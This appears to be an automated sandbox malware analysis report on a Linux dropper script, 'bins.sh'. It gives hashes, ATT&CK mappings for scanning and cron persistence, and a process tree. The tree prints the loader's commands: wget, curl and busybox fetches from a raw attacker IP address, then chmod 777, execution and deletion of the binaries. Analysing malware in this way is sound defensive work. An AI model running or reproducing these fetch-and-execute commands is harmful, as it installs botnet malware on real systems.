d3eecd8c36ad1ce9baed5ddca10403b25037fb7db0baba17634b2343aec6e009

Analysis

max time kernel
150s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
24-11-2024 07:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

245399d5b11b1319056964a63b42e045
SHA1

1226f9d148106b665043268caa31418cda073f78
SHA256

d3eecd8c36ad1ce9baed5ddca10403b25037fb7db0baba17634b2343aec6e009
SHA512

d7b83fe26010bb9cda4ee7d677bde605276d60d1be25c43cc4a6c4d9b98efd79a73149c4ba1f72ac3ee9c68b7201c310be79a1ca865fde0324e8ae94cdaa7482
SSDEEP

192:mAw0aeSJ7lNm7dFu7I4nhhMWKnHzjWKb7EM1TXcQAd2n2T21G+tfzfz7fr8AwFIN:bO6e2T2q1G+J82q1G+BY

Score

9^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1862) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmod

pid	Process
733	chmod
740	chmod
750	chmod
776	chmod

Executes dropped EXE 4 IoCs

Processes:

Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSsQcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

ioc	pid	Process
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	734	Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	741	RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs	751	CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q	777	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

Renames itself 1 IoCs

Processes:

QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

pid	Process
779	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.tBoFY9	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Qcurlcurl

description	ioc	Process
File opened for reading	/proc/9/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/21/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/114/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/311/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/849/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/867/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1013/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/78/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/794/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/876/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/913/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/922/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/923/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/979/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/15/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/990/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/7/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/883/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/941/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/882/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/662/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/814/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/991/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1015/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/24/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/860/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/973/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/985/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1010/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/835/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/73/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/367/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/846/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/903/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/5/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/823/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/993/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1012/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/810/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/18/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/148/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/378/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/935/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1008/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/982/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1007/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1016/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/825/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/844/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/850/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/996/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/330/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/873/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/856/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/828/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/841/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/866/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/1004/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/792/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/701/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/713/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
File opened for reading	/proc/795/cmdline	QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetbusyboxwgetcurlbusyboxwgetcurlcurlcurlbusyboxbusybox

description	ioc	Process
File opened for modification	/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q	wget
File opened for modification	/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	wget
File opened for modification	/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	busybox
File opened for modification	/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	wget
File opened for modification	/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	curl
File opened for modification	/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7	busybox
File opened for modification	/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs	wget
File opened for modification	/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs	curl
File opened for modification	/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q	curl
File opened for modification	/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59	curl
File opened for modification	/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs	busybox
File opened for modification	/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:705
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:710
- /usr/bin/wget
  wget http://87.120.125.191/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Writes file to tmp directory
  PID:712
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Writes file to tmp directory
  PID:725
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Writes file to tmp directory
  PID:732
- /bin/chmod
  chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  ./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59
  2⤵
  PID:736
- /usr/bin/wget
  wget http://87.120.125.191/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Writes file to tmp directory
  PID:737
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:738
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Writes file to tmp directory
  PID:739
- /bin/chmod
  chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  ./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  - Executes dropped EXE
  PID:741
- /bin/rm
  rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7
  2⤵
  PID:743
- /usr/bin/wget
  wget http://87.120.125.191/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  - Writes file to tmp directory
  PID:744
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  - Writes file to tmp directory
  PID:745
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  - Writes file to tmp directory
  PID:746
- /bin/chmod
  chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  ./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  - Executes dropped EXE
  PID:751
- /bin/rm
  rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs
  2⤵
  PID:754
- /usr/bin/wget
  wget http://87.120.125.191/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  2⤵
  - Writes file to tmp directory
  PID:755
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:762
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  2⤵
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  ./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:777
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:780
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:781
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:783
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:784
- /bin/rm
  rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q
  2⤵
  PID:793
- /usr/bin/wget
  wget http://87.120.125.191/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF
  2⤵
  PID:797

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.tBoFY9

Filesize
210B

MD5
308d9fdfb5558d224283977d83cf4ba4

SHA1
4f6da1c9f05fa97030c23b7830375965785a4008

SHA256
4d8ad4b6b4f331ed5b78ce5e4c00314a66e83f8bae915d6e0efcdd410f4c056a

SHA512
7125ddaabbbab33ba62470955ea2e04c41ce8b4281ad2df0b446382570b4797854a02025ad4d648afc5cc694188459d3247fa12041a09d3a12ce2814c02c3bcf

Download Submit